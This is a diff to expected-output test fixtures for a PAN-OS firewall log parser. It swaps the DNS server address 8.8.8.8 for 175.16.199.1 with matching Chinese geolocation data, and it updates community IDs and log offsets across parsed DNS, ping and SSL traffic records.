@@ -1061,12 +1025,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "23933", - "panw.panos.network.nat.community_id": "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ=", + "panw.panos.network.nat.community_id": "1:SU+OmGVh/EDib8CmztQBWimJutE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091121, "panw.panos.source.interface": "ethernet1/2", @@ -1081,14 +1045,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.207", - "8.8.8.8" + "192.168.15.207" ], "rule.name": "new_outbound_from_trust", "server.bytes": 221, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -1114,14 +1078,7 @@ "client.packets": 16, "client.port": 55112, "destination.address": "17.249.60.78", - "destination.as.number": 714, - "destination.as.organization.name": "Apple Inc.", "destination.bytes": 5469, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "17.249.60.78", "destination.nat.ip": "17.249.60.78", "destination.nat.port": 443, @@ -1149,7 +1106,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 4655, + "log.offset": 4705, "network.application": "apple-push-notifications", "network.bytes": 9978, "network.community_id": [ 
@@ -1223,17 +1180,18 @@ "client.nat.port": 24377, "client.packets": 1, "client.port": 57632, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 224, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1247,7 +1205,7 @@ "event.end": "2018-11-30T16:08:52.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:08:52.000-02:00", "event.timezone": "-02:00", @@ -1259,12 +1217,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 5180, + "log.offset": 5230, "network.application": "dns", "network.bytes": 297, "network.community_id": [ - "1:5lGtGtzRH+NHOqMOFVuXwxg5nCo=", - "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs=" + "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=", + "1:wSCOZL6w2h6wEM1XNXlcQojHrKI=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -1281,12 +1239,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24161", - "panw.panos.network.nat.community_id": "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs=", + "panw.panos.network.nat.community_id": "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091123, "panw.panos.source.interface": "ethernet1/2", @@ -1301,14 +1259,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.207", - "8.8.8.8" + "192.168.15.207" ], "rule.name": "new_outbound_from_trust", "server.bytes": 224, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -1333,17 +1291,18 @@ "client.nat.port": 48792, "client.packets": 1, "client.port": 50271, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 117, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1357,7 +1316,7 @@ "event.end": "2018-11-30T16:08:52.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:08:52.000-02:00", "event.timezone": "-02:00", @@ -1369,12 +1328,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 5629, + "log.offset": 5689, "network.application": "dns", "network.bytes": 186, "network.community_id": [ - "1:WbAIgVVT23pzqAJkSDF68HGSPY4=", - "1:ewaPydF3S4wOU8oEi8ykj+ETSIY=" + "1:IbMAPI2u73wwPw/13/OGzLYogKE=", + "1:difgeoigC1UX5MzBPcE93MzIaZA=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -1391,12 +1350,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24107", - "panw.panos.network.nat.community_id": "1:ewaPydF3S4wOU8oEi8ykj+ETSIY=", + "panw.panos.network.nat.community_id": "1:IbMAPI2u73wwPw/13/OGzLYogKE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091124, "panw.panos.source.interface": "ethernet1/2", @@ -1411,14 +1370,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.207", - "8.8.8.8" + "192.168.15.207" ], "rule.name": "new_outbound_from_trust", "server.bytes": 117, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -1443,17 +1402,18 @@ "client.nat.port": 2987, "client.packets": 1, "client.port": 54061, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 307, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1467,7 +1427,7 @@ "event.end": "2018-11-30T16:08:52.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:08:52.000-02:00", "event.timezone": "-02:00", @@ -1479,12 +1439,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 6078, + "log.offset": 6148, "network.application": "dns", "network.bytes": 392, "network.community_id": [ - "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=", - "1:b+lWViOjpbOZConz3JzrSDR609Q=" + "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=", + "1:rukFlCTeT6g0aD5WOkvZ1QaFQrQ=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -1501,12 +1461,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24063", - "panw.panos.network.nat.community_id": "1:+6FjOLCCWY+JDxSWKn7tYpAXksA=", + "panw.panos.network.nat.community_id": "1:gyqXSPK4UfpIaavm5ElvzpaQJAs=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091125, "panw.panos.source.interface": "ethernet1/2", @@ -1521,14 +1481,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.207", - "8.8.8.8" + "192.168.15.207" ], "rule.name": "new_outbound_from_trust", "server.bytes": 307, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -1553,17 +1513,18 @@ "client.nat.port": 6945, "client.packets": 1, "client.port": 52701, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 365, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1577,7 +1538,7 @@ "event.end": "2018-11-30T16:08:52.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:08:52.000-02:00", "event.timezone": "-02:00", @@ -1589,12 +1550,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 6526, + "log.offset": 6606, "network.application": "dns", "network.bytes": 440, "network.community_id": [ - "1:dnGaTG13rwIh66+Pj0GQSdJMhu8=", - "1:rR5F8eZHI1nwmznedxqG9e8vUQE=" + "1:DPokRa42hI+2E3a2DWdKPltL/Hs=", + "1:TG8yX3XeuNWXzsGRmRkB5EraqBM=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -1611,12 +1572,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24145", - "panw.panos.network.nat.community_id": "1:rR5F8eZHI1nwmznedxqG9e8vUQE=", + "panw.panos.network.nat.community_id": "1:TG8yX3XeuNWXzsGRmRkB5EraqBM=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091126, "panw.panos.source.interface": "ethernet1/2", @@ -1631,14 +1592,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.207", - "8.8.8.8" + "192.168.15.207" ], "rule.name": "new_outbound_from_trust", "server.bytes": 365, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -1663,17 +1624,18 @@ "client.nat.port": 0, "client.packets": 6, "client.port": 0, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 588, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 6, "destination.port": 0, 
@@ -1687,7 +1649,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -1699,12 +1661,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 6974, + "log.offset": 7064, "network.application": "ping", "network.bytes": 1176, "network.community_id": [ - "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", - "1:iNhLzwoKKarTKCq59Sts/hhZN7Q=" + "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", + "1:P75WlJ7hfYMGDrg11tgcwQhxoAI=" ], "network.direction": "outbound", "network.packets": 12, 
@@ -1721,12 +1683,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 0, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24245", - "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=", + "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091127, "panw.panos.source.interface": "ethernet1/2", @@ -1741,14 +1703,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 588, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 0, "server.packets": 6, "server.port": 0, 
@@ -1773,17 +1735,18 @@ "client.nat.port": 42208, "client.packets": 1, "client.port": 62503, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 161, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -1797,7 +1760,7 @@ "event.end": "2018-11-30T16:08:55.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:08:54.000-02:00", "event.timezone": "-02:00", @@ -1809,12 +1772,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 7418, + "log.offset": 7518, "network.application": "dns", "network.bytes": 258, "network.community_id": [ - "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=", - "1:Jof66SUOY3j4C+WrZwbgtKls1/Y=" + "1:26TJuKDYd30VKSNqMturHXRN7aU=", + "1:LxppHna9qJmqS3k5notTeotpkFE=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -1831,12 +1794,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24167", - "panw.panos.network.nat.community_id": "1:81Mi4MwpmNYtUrc7CMJH0MPRelU=", + "panw.panos.network.nat.community_id": "1:26TJuKDYd30VKSNqMturHXRN7aU=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091128, "panw.panos.source.interface": "ethernet1/2", @@ -1851,14 +1814,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 161, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -1884,14 +1847,7 @@ "client.packets": 14, "client.port": 52442, "destination.address": "98.138.49.44", - "destination.as.number": 36646, - "destination.as.organization.name": "Oath Holdings Inc.", "destination.bytes": 7805, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "98.138.49.44", "destination.nat.ip": "98.138.49.44", "destination.nat.port": 443, @@ -1919,7 +1875,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 7867, + "log.offset": 7977, "network.application": "ssl", "network.bytes": 9891, "network.community_id": [ 
@@ -1994,14 +1950,7 @@ "client.packets": 13, "client.port": 52441, "destination.address": "72.30.3.43", - "destination.as.number": 26101, - "destination.as.organization.name": "Oath Holdings Inc.", "destination.bytes": 6106, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "72.30.3.43", "destination.nat.ip": "72.30.3.43", "destination.nat.port": 443, @@ -2029,7 +1978,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 8350, + "log.offset": 8460, "network.application": "ssl", "network.bytes": 8460, "network.community_id": [ @@ -2103,17 +2052,18 @@ "client.nat.port": 0, "client.packets": 2, "client.port": 0, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 196, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 0, "destination.packets": 2, "destination.port": 0, 
@@ -2127,7 +2077,7 @@ "event.end": "2018-11-30T16:09:15.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:15.000-02:00", "event.timezone": "-02:00", @@ -2139,12 +2089,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 8829, + "log.offset": 8939, "network.application": "ping", "network.bytes": 392, "network.community_id": [ - "1:/l9vT9UwjkUeC6vNW93wy71+TBk=", - "1:QVXHpdoObbzEeqP6DGULYxqYgAY=" + "1:CuvJ9gIwhrK2dxa778UoOqidePk=", + "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=" ], "network.direction": "outbound", "network.packets": 4, 
